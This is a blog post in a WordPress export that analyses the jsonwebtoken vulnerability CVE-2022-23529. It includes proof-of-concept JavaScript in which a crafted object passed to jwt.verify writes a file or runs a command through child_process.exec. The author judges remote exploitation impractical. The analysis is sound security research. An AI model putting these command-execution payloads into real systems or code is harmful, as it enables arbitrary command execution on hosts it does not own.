{"id":61142,"date":"2023-01-18T17:27:53","date_gmt":"2023-01-18T09:27:53","guid":{"rendered":"https:\/\/version-2.com\/?p=61142"},"modified":"2024-09-13T16:31:49","modified_gmt":"2024-09-13T08:31:49","slug":"jwt-arbitrary-command-execution-cve-2022-23529","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/","title":{"rendered":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"61142\" class=\"elementor elementor-61142\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><h3><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\" width=\"511\" height=\"510\" \/><\/h3><h3>Introduction<\/h3><p>Arbitrary command execution has been found in JsonWebToken version 8.5.1 and lower, and registered as CVE-2022\u201323529<\/p><h4>Library details<\/h4><ul><li>Description:<\/li><\/ul><p>JSON Web Token (JWT) is an open standard (<a href=\"https:\/\/tools.ietf.org\/html\/rfc7519\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">RFC 7519<\/a>) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the <strong>HMAC<\/strong> algorithm) or a public\/private key pair using <strong>RSA<\/strong> or <strong>ECDSA<\/strong>.<\/p><ul><li>Website: <a href=\"https:\/\/jwt.io\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/jwt.io\/<\/a><\/li><li>Source code: <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/auth0\/node-jsonwebtoken<\/a><\/li><\/ul><h4>The vulnerability<\/h4><p>When a user access some page, the token will be passed to <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken#jwtverifytoken-secretorpublickey-options-callback\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">verify<\/a> the method in the back-end. so what happens is that verify method takes three parameters token, secretOrPublickKey, [options, callback].<\/p><p>you can pass a payload to the second parameter and that payload will be executed.<\/p><h3>The End\u00a0Game<\/h3><p>Based on what unit42 discovered and also based on my analysis it\u2019s not easy or obvious how to achieve full RCE.<\/p><p>I want to show the analysis I did here, my final thoughts explaining why I don\u2019t think RCE or I don\u2019t see real exploitation behind it.<\/p><p>Maybe I\u2019m wrong, or Maybe I\u2019m right\u00a0\ud83d\ude00 Who knows!<\/p><h3>Prerequisites<\/h3><ul><li>Download nodejs<\/li><\/ul><pre><code>sudo apt install nodejs<\/code><\/pre><ul><li>Download npm<\/li><\/ul><pre><code>sudo apt install npm<\/code><\/pre><ul><li>Download jsonwebtoken version 8.5.1 or earlier.<\/li><\/ul><pre><code>npm i jsonwebtoken@8.5.1 <\/code><\/pre><ul><li>Understanding of how jsonwebtoken works?<\/li><\/ul><p>I won\u2019t go into detail here, but I will explain the basics of the structure of JWT and how it works.<\/p><p>I will provide references so you can dive in depth with it if you like.<\/p><p>Basically, JWT token consists of three parts<\/p><ul><li>Header: Algorithm &amp; Token Type<\/li><li>Payload: Data<\/li><li>Verify Signature<\/li><\/ul><p>Example:<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*_HdJqhV_hMbLO0cNXPm-hQ.png\" \/><\/p><p>When the user login in, the request with username and password go to Auth server, and the Auth server will verify and check the username and password based on that it will generate JWT Token for this user.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Gf4w3BtnQGQLPSkvwzxeSg.png\" \/><\/p><p>Now each time the user visits any page or route, the JWT token will be associated with the request headers.<\/p><p><a href=\"https:\/\/dev.to\/kcdchennai\/how-jwt-json-web-token-authentication-works-21e7\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/dev.to\/kcdchennai\/how-jwt-json-web-token-authentication-works-21e7<\/a><\/p><p><a href=\"https:\/\/jwt.io\/introduction\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/jwt.io\/introduction<\/a><\/p><h3>Dynamic Analysis<\/h3><p>I started with reproducing what unit42 already explained.<\/p><p>I\u2019m using ubuntu, so you can start nodejs by typing the command<\/p><pre><code>nodejs<\/code><\/pre><p>Import jsonwebtoken.<\/p><pre><code>jwt = require('jsonwebtoken');<\/code><\/pre><p>Generate token<\/p><pre><code>token = jwt.sign({\"x\":\"y\"}, 'some_secret');<\/code><\/pre><p>This is the payload they used<\/p><pre><code>var mal_obj = { toString : ()=&gt; {console.log('PWNED!!!');process.on('exit', ()=&gt; {require('fs').writeFileSync('malicious.txt', 'PWNED!!!!');});process.exit(0)}}<\/code><\/pre><p>Now, pass the token and payload variable to verify<\/p><pre><code>jwt.verify(token, mal_obj)<\/code><\/pre><p>You will see PWNED!!! printed on the console.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*OIPcC5UrZixvPK8n6v25yg.png\" \/><\/p><p>Also, a file called malicious.txt has been created<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kgfJgJozpqd2RHEvhc7xWQ.png\" \/><\/p><p>Also \u201cPWNED!!!!\u201d has been written inside the file<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*vda_4wDIdnkLSHXu_fjlfw.png\" \/><\/p><p>This happened because this is what the payload we executed does.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*AqBZcyuab_2Z8HA7CCjoew.png\" \/><\/p><p>I also wanted to see if I can execute commands, so I used this payload<\/p><pre><code>var mal_obj = { toString : ()=&gt; {process.on('exit', ()=&gt; {require('child_process').exec('firefox');});process.exit(0)}};<\/code><\/pre><p>and I got firefox launched.<\/p><h3>\u00a0<\/h3><h3>Static Analysis<\/h3><p>Let\u2019s do some code review and see what went wrong<\/p><p>Download the source code of JWT 8.5.1 from here:<\/p><p><a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\/releases\/tag\/v8.5.1\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/auth0\/node-jsonwebtoken\/releases\/tag\/v8.5.1<\/a><\/p><p>Open verify.js<\/p><p>here is where the vulnerable snippet of the code based on unit42 report.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Rf5xHf5WJ7HXYvrCRtXnYw.png\" \/><\/p><p>After I tried to craft\/edit\/manipulate the JWT token, it didn\u2019t really work.<\/p><p>in fact, it makes sense why it didn\u2019t work because the payload supposes to go into the second parameter in the verify method where it\u2019s marked in red, but the token is the first parameter, it\u2019s marked in blue.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*t3AtgWp26UAVlQI5idLtHA.png\" \/><\/p><h3>Final thoughts<\/h3><p>To be honest, I\u2019m not sure how this can be exploited remotely or even if you have access to the backend. However, based on what\u2019s mentioned in \u201cExploitation Prerequisites\u201d section in unit42 report it looks like there is no obvious scenario to exploit this.<\/p><p>Also based on the comments in the GitHub commit <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\/commit\/e1fa9dcc12054a8681db4e6373da1b30cf7016e3#diff-a32f3d1ddd0e3a886fef0b4523039c3b786a5ac01aea6b13421fa494187762e7\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">here<\/a> it looks like a lot of people agree on that as well.<\/p><p><strong>Some ideas for more in-depth research I was thinking about:<\/strong><\/p><ul><li>Maybe finding some misconfiguration scenario for JWT would help with exploiting this vulnerability.<\/li><li>I was thinking, about how those parameters get stored? for example in smart contracts variables are in memories like in slides. so you can overwrite the second variable in our case the secretOrPublicKey variable.<\/li><\/ul><p>#jwt #cve #analysis #CVE-2022-23529<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction Arbitrary command execution has been found [&hellip;]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-61142","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction Arbitrary command execution has been found [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-18T09:27:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\"},\"author\":{\"name\":\"versionpan\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\"},\"headline\":\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529\",\"datePublished\":\"2023-01-18T09:27:53+00:00\",\"dateModified\":\"2024-09-13T08:31:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\"},\"wordCount\":682,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529\",\"name\":\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"datePublished\":\"2023-01-18T09:27:53+00:00\",\"dateModified\":\"2024-09-13T08:31:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\",\"name\":\"versionpan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"caption\":\"versionpan\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/versionpan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","og_locale":"zh_HK","og_type":"article","og_title":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2","og_description":"Introduction Arbitrary command execution has been found [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","og_site_name":"Version 2","article_published_time":"2023-01-18T09:27:53+00:00","article_modified_time":"2024-09-13T08:31:49+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"versionpan","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"versionpan","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"5 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/"},"author":{"name":"versionpan","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8"},"headline":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529","datePublished":"2023-01-18T09:27:53+00:00","dateModified":"2024-09-13T08:31:49+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/"},"wordCount":682,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"zh-HK"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/","url":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","name":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 